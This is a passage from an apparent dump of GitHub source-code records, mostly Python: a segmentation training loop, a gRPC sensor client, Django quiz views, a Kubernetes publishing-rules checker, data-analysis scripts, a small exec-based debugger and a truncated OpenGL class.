metrics import StreamSegMetrics\nfrom utils.configs import get_argparser, get_dataset\nfrom utils.loss import Loss\nfrom utils.train_options import get_input, calc_loss\n\n\ndef validate(opts, model, loader, device, metrics):\n \"\"\"Do validation and return specified samples\"\"\"\n metrics.reset()\n if opts.save_val_results:\n if not os.path.exists('results'):\n os.mkdir('results')\n denorm = utils.Denormalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n img_id = 0\n\n with torch.no_grad():\n for i, (images, labels) in tqdm(enumerate(loader)):\n\n images = images.to(device, dtype=torch.float32)\n labels = labels.to(device, dtype=torch.long)\n\n outputs = model(images)\n preds = 
outputs.detach().max(dim=1)[1].cpu().numpy()\n targets = labels.cpu().numpy()\n\n metrics.update(targets, preds)\n\n if opts.save_val_results:\n for i in range(len(images)):\n image = images[i].detach().cpu().numpy()\n target = targets[i]\n pred = preds[i]\n\n image = (denorm(image) * 255).transpose(1, 2, 0).astype(np.uint8)\n target = loader.dataset.decode_target(target).astype(np.uint8)\n pred = loader.dataset.decode_target(pred).astype(np.uint8)\n\n Image.fromarray(image).save('results/%d_image.png' % img_id)\n Image.fromarray(target).save('results/%d_target.png' % img_id)\n Image.fromarray(pred).save('results/%d_pred.png' % img_id)\n\n fig = plt.figure()\n plt.imshow(image)\n plt.axis('off')\n plt.imshow(pred, alpha=0.7)\n ax = plt.gca()\n ax.xaxis.set_major_locator(matplotlib.ticker.NullLocator())\n ax.yaxis.set_major_locator(matplotlib.ticker.NullLocator())\n plt.savefig('results/%d_overlay.png' % img_id, bbox_inches='tight', pad_inches=0)\n plt.close()\n img_id += 1\n\n score = metrics.get_results()\n return score\n\n\ndef main():\n opts = get_argparser().parse_args()\n\n os.environ['CUDA_VISIBLE_DEVICES'] = opts.gpu_ids\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n opts.device = device\n print(\"Device: %s\" % device)\n\n # Setup random seed\n torch.manual_seed(opts.random_seed)\n np.random.seed(opts.random_seed)\n random.seed(opts.random_seed)\n\n # Setup dataloader\n train_dst, val_dst = get_dataset(opts)\n train_loader = data.DataLoader(\n train_dst, batch_size=opts.batch_size, shuffle=True, num_workers=2)\n val_loader = data.DataLoader(\n val_dst, batch_size=opts.val_batch_size, shuffle=False, num_workers=2)\n print(\"Dataset: %s, Train set: %d, Val set: %d\" %\n (opts.dataset, len(train_dst), len(val_dst)))\n\n # Set up model\n model = network.model_map[opts.model](num_classes=opts.num_classes, output_stride=opts.output_stride,\n pretrained_backbone=True)\n if opts.separable_conv and 'plus' in opts.model:\n network.convert_to_separable_conv(model.classifier)\n utils.set_bn_momentum(model.backbone, momentum=0.01)\n\n # Set up metrics\n metrics = StreamSegMetrics(opts.num_classes)\n\n # Set up optimizer\n optimizer = torch.optim.SGD(params=[\n {'params': model.backbone.parameters(), 'lr': 0.1 * opts.lr},\n {'params': model.classifier.parameters(), 'lr': opts.lr},\n ], lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n # optimizer = torch.optim.SGD(params=model.parameters(), lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n # torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.lr_decay_step, gamma=opts.lr_decay_factor)\n if opts.lr_policy == 'poly':\n scheduler = utils.PolyLR(optimizer, opts.total_itrs, power=0.9)\n elif opts.lr_policy == 'step':\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.step_size, gamma=0.1)\n\n criterion = Loss(opts)\n\n def save_ckpt(path):\n \"\"\" save current model\n \"\"\"\n torch.save({\n \"cur_epochs\": cur_epochs,\n \"cur_itrs\": cur_itrs,\n \"model_state\": model.module.state_dict(),\n \"optimizer_state\": optimizer.state_dict(),\n \"scheduler_state\": scheduler.state_dict(),\n \"best_score\": best_score,\n }, path)\n print(\"Model saved as %s\" % path)\n\n utils.mkdir('checkpoints')\n # Restore\n best_score = 0.0\n cur_itrs = 0\n cur_epochs = 0\n if opts.ckpt is not None and os.path.isfile(opts.ckpt):\n checkpoint = torch.load(opts.ckpt, map_location=torch.device('cpu'))\n model.load_state_dict(checkpoint[\"model_state\"])\n model = nn.DataParallel(model)\n 
model.to(device)\n if opts.continue_training:\n optimizer.load_state_dict(checkpoint[\"optimizer_state\"])\n scheduler.load_state_dict(checkpoint[\"scheduler_state\"])\n cur_epochs = checkpoint[\"cur_epochs\"]\n cur_itrs = checkpoint[\"cur_itrs\"]\n best_score = checkpoint['best_score']\n print(\"Training state restored from %s\" % opts.ckpt)\n print(\"Model restored from %s\" % opts.ckpt)\n del checkpoint # free memory\n else:\n print(\"[!] Retrain\")\n model = nn.DataParallel(model)\n model.to(device)\n\n # ========== Train Loop ==========#\n if opts.test_only:\n model.eval()\n val_score = validate(\n opts=opts, model=model, loader=val_loader, device=device, metrics=metrics)\n print(metrics.to_str(val_score))\n return\n\n interval_loss = 0\n while True: # cur_itrs < opts.total_itrs:\n # ===== Train =====\n criterion.start_log()\n model.train()\n cur_epochs += 1\n for (images, labels) in train_loader:\n cur_itrs += 1\n\n # images = images.to(device, dtype=torch.float32)\n # labels = labels.to(device, dtype=torch.long)\n images, labels = get_input(images, labels, opts, device, cur_itrs)\n\n optimizer.zero_grad()\n outputs = model(images)\n\n # loss = criterion(outputs, labels)\n loss = calc_loss(criterion, outputs, labels, opts)\n loss.backward()\n optimizer.step()\n\n np_loss = loss.detach().cpu().numpy()\n interval_loss += np_loss\n\n print(f\"\\rEpoch {cur_epochs}, Itrs {cur_itrs}/{opts.total_itrs}, Loss={np_loss}\", end='')\n\n if (cur_itrs) % 10 == 0:\n interval_loss = interval_loss / 10\n print(f\"\\rEpoch {cur_epochs}, Itrs {cur_itrs}/{opts.total_itrs}, Loss={interval_loss}\")\n interval_loss = 0.0\n\n if (cur_itrs) % opts.save_interval == 0 and (cur_itrs) % opts.val_interval != 0:\n save_ckpt('checkpoints/latest_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.output_stride))\n\n if (cur_itrs) % opts.val_interval == 0:\n save_ckpt('checkpoints/latest_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.output_stride))\n print(\"validation...\")\n model.eval()\n val_score = validate(opts=opts, model=model, loader=val_loader, device=device,\n metrics=metrics)\n print(metrics.to_str(val_score))\n if val_score['Mean IoU'] > best_score: # save best model\n best_score = val_score['Mean IoU']\n save_ckpt('checkpoints/best_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.output_stride))\n model.train()\n scheduler.step()\n\n if cur_itrs >= opts.total_itrs:\n return\n criterion.end_log(len(train_loader))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kk1990kk/SemanticSegmentation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"2395856862","text":"\"\"\"\nAn example gRPC Client for the IMU Service\n\"\"\"\n\nimport logging\nimport time\n\nimport grpc\nimport imu_pb2\nimport imu_pb2_grpc\n\n\ndef get_status(stub):\n status = stub.GetStatus(imu_pb2.EmptyRequest())\n print(\n \"\"\"======== Status ===========\nis_updating: %s\nhas_position: %s\nposition_stable %s\nis_mag_calibrating %s\nmag_calibrated %s\nmpu_calibrated %s\"\"\"\n % (\n status.is_updating,\n status.has_position,\n status.position_stable,\n status.is_mag_calibrating,\n status.mag_calibrated,\n status.mpu_calibrated,\n )\n )\n return status\n\n\ndef get_position(stub):\n position = stub.GetPosition(imu_pb2.EmptyRequest())\n print(\n \"\"\"======== Position ========\nroll_raw: %s\npitch_raw: %s\nyaw_raw: %s\nroll_filtered: %s\npitch_filtered: %s\nyaw_filtered: %s\nroll_smoothed: 
%s\npitch_smoothed: %s\nyaw_smoothed: %s\"\"\"\n % (\n position.roll_raw,\n position.pitch_raw,\n position.yaw_raw,\n position.roll_filtered,\n position.pitch_filtered,\n position.yaw_filtered,\n position.roll_smoothed,\n position.pitch_smoothed,\n position.yaw_smoothed,\n )\n )\n return position\n\n\ndef start_updating(stub):\n stub.StartUpdating(imu_pb2.EmptyRequest())\n\n\ndef stop_updating(stub):\n stub.StopUpdating(imu_pb2.EmptyRequest())\n\n\ndef run():\n with grpc.insecure_channel(\"localhost:50052\") as channel:\n stub = imu_pb2_grpc.ImuServiceStub(channel)\n print(\"-------------- GetStatus --------------\")\n status = get_status(stub)\n print(repr(status))\n\n if not status.mpu_calibrated:\n stub.CalibrateMPU(imu_pb2.EmptyRequest())\n stub.Configure(imu_pb2.EmptyRequest())\n\n if not status.is_updating and not status.has_position:\n print(\"-------------- StartUpdating --------------\")\n start_updating(stub)\n\n status = get_status(stub)\n\n print(\"-------------- GetPosition --------------\")\n while True:\n get_position(stub)\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n run()\n","repo_name":"se1exin/auto-telescope","sub_path":"services/imu/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23220021198","text":"from array import array\nfrom django.http.response import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom .models import quiz\n\n# Create your views here.\ndef create(request):\n question = request.POST['question']\n type = 'radio'\n point = int(request.POST['point'])\n Rightanswer = request.POST['an_correct']\n data = quiz.objects.create(question=question,type=type,answer=[request.POST['an1'],request.POST['an2'],request.POST['an3']],point=point,Rightanswer=Rightanswer)\n data.save()\n return JsonResponse({'id':data.id})\n\n \ndef edit(request):\n if not 'question' in request.POST:\n return HttpResponse('not found question')\n elif not 'type' in request.POST:\n return HttpResponse('not found type')\n elif not 'answer' in request.POST:\n return HttpResponse('not found answer')\n elif not 'point' in request.POST:\n return HttpResponse('not found point')\n elif not 'Rightanswer' in request.POST:\n return HttpResponse('not found right answer')\n elif not 'id' in request.POST:\n return HttpResponse('not found id')\n else:\n question = request.POST['question']\n type = request.POST['type']\n answer = request.POST['answer']\n point = int(request.POST['point'])\n Rightanswer = request.POST['Rightanswer']\n id = request.POST['id']\n quiz.objects.filter(id=id).update(question=question,type=type,answer=[answer],point=point,Rightanswer=Rightanswer)\n return HttpResponse('updated', status=200)\ndef delete(request,id):\n quiz.objects.filter(id=id).delete()\n return HttpResponse('deleted', status=200)\ndef getDetail(request):\n if not 'id' in request.POST:\n return HttpResponse('id not found', status='400')\n else:\n id = request.POST['id']\n data_lesson = quiz.objects.filter(id=id).values()\n return JsonResponse({\"theQuiz\": list(data_lesson)})\ndef getOnly(request,id):\n data = quiz.objects.filter(id=id).values()\n return JsonResponse({'quiz':list(data)})","repo_name":"vanluan4440/django","sub_path":"App/quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} 
+{"seq_id":"32106422838","text":"import pandas as pd\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('1983.csv')\r\n\r\ng = df.groupby('tourney_id')\r\n\r\ndf2 = pd.read_csv('tournament.csv')\r\n\r\nfor index, row in df2.iterrows():\r\n tournament = g.get_group(row['Tournament'])\r\n\r\n winner_ranking = tournament[['winner_age']]\r\n loser_ranking = tournament[['loser_age']] \r\n\r\n #collect all rankings\r\n allranking = np.concatenate((winner_ranking, loser_ranking))\r\n allranking = np.unique(allranking)\r\n\r\n #sum first 20 ranked players of the draw\r\n drawdiff = [sum(allranking[0:20])]\r\n print(drawdiff)","repo_name":"Tennismylife/GOAT-Theory","sub_path":"DrawDiff/DrawDifficultyCalc.py","file_name":"DrawDifficultyCalc.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35852874426","text":"import fnmatch\nimport os\nimport sys\nimport json\n\n\ndef get_gomod_dependencies(rootdir, components):\n all_dependencies = {}\n for component in components:\n with open(os.path.join(rootdir, component, \"go.mod\")) as f:\n print((component + \" dependencies\"))\n all_dependencies[component] = []\n lines = list(set(f))\n lines.sort()\n for line in lines:\n for dep in components:\n if dep == component:\n continue\n if (\"k8s.io/\" + dep + \" =>\") not in line:\n continue\n print((\"\\t\"+dep))\n if dep not in all_dependencies[component]:\n all_dependencies[component].append(dep)\n return all_dependencies\n\n\ndef get_rules_dependencies(rules_file):\n import yaml\n with open(rules_file) as f:\n data = yaml.safe_load(f)\n return data\n\n\ndef main():\n rootdir = os.path.dirname(__file__) + \"/../\"\n rootdir = os.path.abspath(rootdir)\n\n components = []\n for component in os.listdir(rootdir + '/staging/src/k8s.io/'):\n components.append(component)\n components.sort()\n\n rules_file = \"/staging/publishing/rules.yaml\"\n try:\n import yaml\n except ImportError:\n print((\"Please install missing pyyaml module and re-run %s\" % sys.argv[0]))\n sys.exit(1)\n rules_dependencies = get_rules_dependencies(rootdir + rules_file)\n\n gomod_dependencies = get_gomod_dependencies(rootdir + '/staging/src/k8s.io/', components)\n\n processed_repos = []\n for rule in rules_dependencies[\"rules\"]:\n branch = rule[\"branches\"][0]\n\n # If this no longer exists in master\n if rule[\"destination\"] not in gomod_dependencies:\n # Make sure we don't include a rule to publish it from master\n for branch in rule[\"branches\"]:\n if branch[\"name\"] == \"master\":\n raise Exception(\"cannot find master branch for destination %s\" % rule[\"destination\"])\n # And skip validation of publishing rules for it\n continue\n\n for item in rule[\"branches\"]:\n if \"dir\" in item[\"source\"]:\n raise Exception(\"use of deprecated `dir` field in rules for `%s`\" % (rule[\"destination\"]))\n if len(item[\"source\"][\"dirs\"]) > 1:\n raise Exception(\"cannot have more than one directory (`%s`) per source branch `%s` of `%s`\" %\n (item[\"source\"][\"dirs\"], item[\"source\"][\"branch\"], rule[\"destination\"])\n )\n if not item[\"source\"][\"dirs\"][0].endswith(rule[\"destination\"]):\n raise Exception(\"copy/paste error `%s` refers to `%s`\" % (rule[\"destination\"],item[\"source\"][\"dir\"]))\n\n if branch[\"name\"] != \"master\":\n raise Exception(\"cannot find master branch for destination %s\" % rule[\"destination\"])\n if branch[\"source\"][\"branch\"] != \"master\":\n raise Exception(\"cannot find master source branch for 
destination %s\" % rule[\"destination\"])\n\n # we specify the go version for all master branches through `default-go-version`\n # so ensure we don't specify explicit go version for master branch in rules\n if \"go\" in branch:\n raise Exception(\"go version must not be specified for master branch for destination %s\" % rule[\"destination\"])\n\n print((\"processing : %s\" % rule[\"destination\"]))\n if rule[\"destination\"] not in gomod_dependencies:\n raise Exception(\"missing go.mod for %s\" % rule[\"destination\"])\n processed_repos.append(rule[\"destination\"])\n processed_deps = []\n for dep in set(gomod_dependencies[rule[\"destination\"]]):\n found = False\n if \"dependencies\" in branch:\n for dep2 in branch[\"dependencies\"]:\n processed_deps.append(dep2[\"repository\"])\n if dep2[\"branch\"] != \"master\":\n raise Exception(\"Looking for master branch and found : %s for destination\", dep2,\n rule[\"destination\"])\n if dep2[\"repository\"] == dep:\n found = True\n else:\n raise Exception(\n \"Please add %s as dependencies under destination %s in %s\" % (gomod_dependencies[rule[\"destination\"]], rule[\"destination\"], rules_file))\n if not found:\n raise Exception(\"Please add %s as a dependency under destination %s in %s\" % (dep, rule[\"destination\"], rules_file))\n else:\n print((\" found dependency %s\" % dep))\n extraDeps = set(processed_deps) - set(gomod_dependencies[rule[\"destination\"]])\n if len(extraDeps) > 0:\n raise Exception(\"extra dependencies in rules for %s: %s\" % (rule[\"destination\"], ','.join(str(s) for s in extraDeps)))\n items = set(gomod_dependencies.keys()) - set(processed_repos)\n if len(items) > 0:\n raise Exception(\"missing rules for %s\" % ','.join(str(s) for s in items))\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"kubernetes/kubernetes","sub_path":"hack/verify-publishing-bot.py","file_name":"verify-publishing-bot.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":103227,"dataset":"github-code","pt":"2"} +{"seq_id":"34766375534","text":"import matplotlib.pyplot as plt\nimport tifffile as tiff\nimport cv2\nimport pandas as pd\nimport os\nimport numpy as np\nfrom stainnet import StainNet\nimport torch\nimport staintools\n\ndef read_tiff(image_file, mode='rgb'):\n\timage = tiff.imread(image_file)\n\timage = image.squeeze()\n\tif image.shape[0] == 3:\n\t\timage = image.transpose(1, 2, 0)\n\tif mode=='bgr':\n\t\timage = image[:,:,::-1]\n\timage = np.ascontiguousarray(image)\n\treturn image\n\ndef enc2mask(mask_rle, shape):\n img = np.zeros(shape[0]*shape[1], dtype=np.uint8)\n s = mask_rle.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[0::2], s[1::2])]\n starts -= 1\n ends = starts + lengths\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape).T\n\ndef norm(image):\n image = np.array(image).astype(np.float32)\n image = image.transpose((2, 0, 1))\n image = ((image / 255) - 0.5) / 0.5\n image=image[np.newaxis, ...]\n image=torch.from_numpy(image)\n return image\n\ndef un_norm(image):\n image = image.cpu().detach().numpy()[0]\n image = ((image * 0.5 + 0.5) * 255).astype(np.uint8).transpose((1,2,0))\n return image\n\ntrain_df = pd.read_csv('/home/r10user9/Documents/hhb/dataset/train.csv')\n\nimage_dir = '/home/r10user9/Documents/hhb/dataset/train_images'\n\nlist = train_df[train_df['organ'] == 'kidney'].id.values\n# list = [10044, 10912, 10971, 13942, 16609, 20247, 23640, 29213, 4944, 6390, 7397, 7902]\n# for i 
in range(len(lung_list)):\nfor i in range(10):\n image_id = list[i]\n\n source = os.path.join(image_dir, str(image_id) + '.tiff')\n target = os.path.join('/home/r10user9/Documents/hhb/dataset/test_images/10078.tiff')\n source = read_tiff(source, 'rgb')\n # target = read_tiff(target, 'rgb')\n # image = source.astype(np.float32)/255\n\n # normalizer = staintools.ReinhardColorNormalizer()\n # normalizer = staintools.StainNormalizer(method='vahadane')\n # normalizer.fit(target)\n # transform_image = normalizer.transform(source)\n\n\n # stainnet = StainNet().cuda()\n # stainnet.load_state_dict(torch.load('/home/r10user9/Documents/hhb/coatnet_baseline/pretrain_model/StainNet-3x0_best_psnr_layer3_ch32.pth'))\n\n # transform_image = un_norm(stainnet(norm(source).cuda()))\n # fft_image = np.abs(np.fft.fft2(image))\n\n d = train_df[train_df['id'] == image_id]\n rle = d.rle.item()\n mask = enc2mask(rle,(source.shape[1],source.shape[0])) if rle is not None else None\n print(image_id)\n plt.figure(figsize=(10, 10))\n plt.subplot(1, 3, 1); plt.imshow(source); plt.axis('OFF'); plt.title('image')\n # plt.subplot(1, 3, 2); plt.imshow(target); plt.axis('OFF'); plt.title('mask')\n plt.subplot(1, 3, 2); plt.imshow(source); plt.imshow(mask*255, alpha=0.4); plt.axis('OFF'); plt.title('overlay')\n # plt.subplot(1, 3, 3); plt.imshow(transform_image); plt.axis('OFF'); plt.title('mask')\n\n plt.show()","repo_name":"rockyy97/4th-solution-for-kaggle-Hacking-the-Human-Body-competition","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"21375687174","text":"from setuptools import setup\n\nversion = '0.4'\n\nsetup(\n name='WSGIRouter',\n version=version,\n description=('Tiny library for WebOb to manage URL and Request '\n 'routing correctly without many dependencies'),\n keywords='wsgi request web http',\n author='Samuel Alba',\n author_email='sam.alba@gmail.com',\n url='https://github.com/samalba/wsgirouter',\n license='MIT',\n packages=['wsgirouter'],\n package_dir={'wsgirouter': '.'},\n install_requires=['webob >= 1.1.1'],\n zip_safe=True\n )\n","repo_name":"samalba/wsgirouter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"2094991298","text":"from pprint import pprint\nimport inspect\nimport traceback\nimport sys\nimport os\nif os.name != \"nt\":\n import readline\n\n\ndef debugger(locals_, globals_, multi_lines=False, input_history=True,\n safe_word=\"continue\"):\n \"\"\"\n Summary line.\n\n Extended description of function.\n\n Parameters\n ----------\n locals : set\n The set of local variables at the state where you want to debug\n globals : set\n The set of global variables at the state you want to debug\n multi_lines: boolean\n If this is enabled you will be able to write multi-lines code.\n Works better for writting functions(Default false)\n input_history: boolean\n Wheter you want it or not to be able to use previews\n commands with up arrow(Default true)\n safe_word: string\n The string that is used to pass the debugger and\n continue with the program flow\n Returns\n -------\n None\n It does not return\n \"\"\"\n locals_.update({\"EXCEPTION\": \"No exception yet\"})\n __input_history(input_history)\n\n input_func = __get_input_func(multi_lines)\n\n print(\"\\nSTARTING DEBUG\")\n while True:\n if(not multi_lines):\n cmd = 
input_func(\"DEBUG: \")\n else: \n cmd = input_func()\n if(cmd):\n cmd = ''.join(cmd)[:-1]\n\n if (cmd == safe_word):\n break\n __exec_command(cmd, globals_, locals_, safe_word)\n\n print(\"QUITTING DEBUG\")\n\n\ndef __exec_command(cmd, globals_, locals_, safe_word):\n try:\n if cmd == \"globals\":\n for t in __iter_stack():\n pprint(t[0].f_globals)\n if cmd == \"locals\":\n for t in __iter_stack():\n pprint(t[0].f_locals)\n else:\n exec(cmd, globals_, locals_)\n except Exception as e:\n print(\"SOMETHING WENT WRONG\")\n print(traceback.format_exc())\n locals_.update({\"EXCEPTION\": e})\n\ndef __iter_stack():\n for t in inspect.trace():\n l = t[0].f_locals\n if \"self\" in l.keys():\n c = l['self'].__class__.__name__\n else:\n c = \"None\"\n print(f\"FILE: {t.filename}\\tCLASS: {c}\\tFUNC: {t.function}\")\n yield t\n print(\"----------------\")\n\ndef __get_input_func(multi_lines):\n if (multi_lines):\n return sys.stdin.readlines\n return input\n\n\ndef __input_history(input_history):\n if input_history and os.name != \"nt\":\n readline.set_auto_history(True)\n","repo_name":"joseims/InsideOutDebugger","sub_path":"debugger.py","file_name":"debugger.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"15509515484","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 25 13:57:24 2022\n\n@author: eyu\n\"\"\"\n\nfrom abstractDynamics.Simulation import Simulation\nfrom SpringDynamics import SpringDynamics, SpringlessDynamics\nfrom hpuDynamics.FlowProvider import FlowSignalFromFile, ConstantFlowSignal\nfrom plotting.DefaultOutputPlotter import DefaultOutputPlotter\nfrom hpuDynamics.NameToHeaderMap import NameToHeaderMap\nimport scipy.signal\n\nfrom pyqtgraph.Qt import QtGui, QtCore\n\nfilename = \"./data/forward1.csv\"\nnameToHeaderMap = NameToHeaderMap.realMap\ndt = 0.001\n\nparameters = {\"springConstant\" : 500, #N/m\n \"motorRadius\" : 0.01, #m\n \"I\" : 6,\n \"motorTorqueConstant\" : 0.3286,\n \"motorDamping\" : 0.01,\n \"motorInductance\" : 0.0331, #0.001040\n \"motorResistance\" : 0.033,\n \"motorInertia\" : 1, #kgm^4,\n \"dt\" : dt,\n \"inputScaling\" : 100\n }\n\nflowProvider = FlowSignalFromFile(filename, nameToHeaderMap, samplingDt=0.001)\n# flowProvider = ConstantFlowSignal(1)\n\nspringDynamics = SpringDynamics(parameters)\nspringSimulation = Simulation(springDynamics, flowProvider)\n\nspringlessDynamics = SpringlessDynamics(parameters)\nspringlessSimulation = Simulation(springlessDynamics, flowProvider)\n\n\ninitialStateSpringed = {\"x\" : 0,\n \"V_m\" : 0}\n\ninitialStateSpringless = {}\n\nmaxTime = 5\n# maxTime = flowProvider.getMaxTime()\ntimeHistorySpring, outputHistorySpring = springSimulation.simulate(initialStateSpringed, dt, maxTime)\ntimeHistorySpringless, outputHistorySpringless = springlessSimulation.simulate(initialStateSpringless, dt, maxTime)\n\ndef printOutputsAtIndex(i, outputHistory):\n print(i)\n for key in outputHistory.keys():\n print(key + \": \" + str(outputHistory[key][i]))\n \ndef filterOutputs(outputHistory, dt):\n bfilt = scipy.signal.butter(1, 1/dt/10, btype='low', analog=False, fs=1/dt, output='sos')\n filteredOutputs = {}\n for key in outputHistory.keys():\n filteredOutputs[key] = scipy.signal.sosfilt(bfilt, outputHistory[key])\n return filteredOutputs\n\n# filteredOutputs = filterOutputs(outputHistory, dt)\n# plotter = DefaultOutputPlotter(\"unt\", timeHistory, outputHistory, dynamics.getParameterProperties())\nplotter1 = 
DefaultOutputPlotter(\"Spring\", timeHistorySpring, outputHistorySpring, springDynamics.getParameterProperties())\nplotter2 = DefaultOutputPlotter(\"Springless\", timeHistorySpringless, outputHistorySpringless, springlessDynamics.getParameterProperties())\n\nprint(outputHistorySpringless[\"T_m\"] )\nif __name__ == '__main__':\n import sys\n plotter1.plot()\n plotter2.plot()\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()","repo_name":"eeyu/HPU-Accumulator","sub_path":"deprecated/ExecuteSpringMotorSimulation.py","file_name":"ExecuteSpringMotorSimulation.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31380668817","text":"# https://www.codewars.com/kata/552c028c030765286c00007d\n\ndef iq_test(numbers):\n is_even = None\n even, odd = None, None\n ns = [int(n) for n in numbers.split(' ')]\n for i, n in enumerate(ns, 1):\n if n % 2 == 0:\n if is_even == True:\n return i\n if even is not None:\n if odd is not None:\n return odd[0]\n is_even = False\n even = (i, n)\n else:\n if is_even == False:\n return i\n if odd is not None:\n if even is not None:\n return even[0]\n is_even = True\n odd = (i, n)\n raise ValueError('could not determine the odd one out')\n","repo_name":"vonas/challenges","sub_path":"codewars/6-kyu/iq-test.py","file_name":"iq-test.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22729429851","text":"from difflib import SequenceMatcher\n\ndef select_photo_from_options(all_photos, photo_name):\n similar_scores = []\n for photo_result in all_photos:\n result_name = photo_result.accessible_name\n similar_name_ratio = SequenceMatcher(None, result_name, photo_name).ratio()\n similar_scores.append(similar_name_ratio)\n\n photo_index = similar_scores.index(max(similar_scores)) + 1\n if len(all_photos) > 1:\n print(\"Found \" + str(len(all_photos)) + \" photos. Selecting photo \" + str(photo_index) + \". Similarity scores: \" + str(similar_scores))\n return True, photo_index\n","repo_name":"TPN-Labs/Wordpress-Portofolio-Uploader","sub_path":"modal.py","file_name":"modal.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29583565815","text":"from collections import deque\ndef solution(A, B):\n answer = -1\n A=deque(A)\n B=deque(B)\n for i in range(0,len(A)):\n if A==B:\n answer = i\n break\n A.appendleft(A.pop())\n \n return answer","repo_name":"jeonbar2/Coding_Test","sub_path":"프로그래머스/lv0/120921. 
문자열 밀기/문자열 밀기.py","file_name":"문자열 밀기.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19295405256","text":"from extern.testGL.common import constants\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom extern.testGL.zAPI.zRenderer import zBaseClass, zOpenGLTexture\nfrom extern.testGL.zAPI.zDrawing import zRectangle3D\nfrom extern.testGL.zAPI.zDrawing.zPoint3D import Point3D\nfrom Image import *\n\nclass OpenGLSurface(zBaseClass.SurfaceBase):\n \n def __init__(self,ApplyCoordinateTrans=True):\n \n self._GLposX, self._GLposY, self._GLposZ = (0,0,0)\n self._GLwidth, self._GLheight, self._GLdeep = (0,0,0)\n \n zBaseClass.SurfaceBase.__init__(self)\n self._TextureOrder = 0\n self._screenwidth, self._screenheight = constants.GetWindowSize()\n self._ApplyCoordinateTrans = ApplyCoordinateTrans\n self._renderer = None\n self._texture = zOpenGLTexture.OpenGLTexture()\n \n def SetBackgroundImageFromFile(self, FileName, UseAlpha=False):\n zBaseClass.SurfaceBase.SetBackgroundImageFromFile(self, FileName, UseAlpha=False)\n \n if FileName != None: \n _BackgroundImage = open(FileName)\n #Alpha is allowed only for png images\n s = len(FileName)\n ext = FileName[s-3:s]\n if ext not in ('PNG','png'): UseAlpha=False\n \n if UseAlpha == True:\n _format = GL_RGBA\n _ImageBuffer = _BackgroundImage.tostring(\"raw\", \"RGBA\", 0, -1)\n else:\n _format = GL_RGB\n _ImageBuffer = _BackgroundImage.tostring(\"raw\", \"RGB\", 0, -1)\n\n self.set_texture_buffer(_BackgroundImage.size[0], _BackgroundImage.size[1], _format, _ImageBuffer)\n\n\n def set_texture_buffer(self,width, height, _format, _buffer):\n if self._texture.is_init() == True and \\\n\t\t( self._texture.get_size() != (width, height) or self._texture.GetFormat() != _format):\n self._texture = zOpenGLTexture.OpenGLTexture() \n \n if self._texture.is_init() == False:\n\n self._texture.init_texture(width, height, _format, None)\n\n self._texture.set_buffer(_buffer)\n \n def SetBackgroundImageFromBuffer(self, _buffer, width, height, UseAlpha=False):\n\n if UseAlpha == True:\n _format = GL_RGBA\n else:\n _format = GL_RGB\n self.set_texture_buffer(width, height, _format, _buffer)\n \n def SetTextureOrder(self, order):\n if order == 1 or order == 0:\n self._TextureOrder = order\n \n def _SetTextureID(self, textureid):\n #print \"set textureid to \" + str(textureid) + \" on \" + str(self)\n self._TextureID = textureid\n \n def Render(self):\n glPushMatrix()\n \n glTranslatef(self._GLposX, self._GLposY, self._GLposZ)\r glScalef(self._GLwidth, -self._GLheight, self._GLdeep)\n #FIXME cache result.\n r,g,b,a = self.GetBackColorWithAlpha()\n glColorf(r/255.0, g/255.0, b/255.0, a/255.0)\n \n (_XTextureRatio, _YTextureRatio) = (1.0, 1.0) \n if 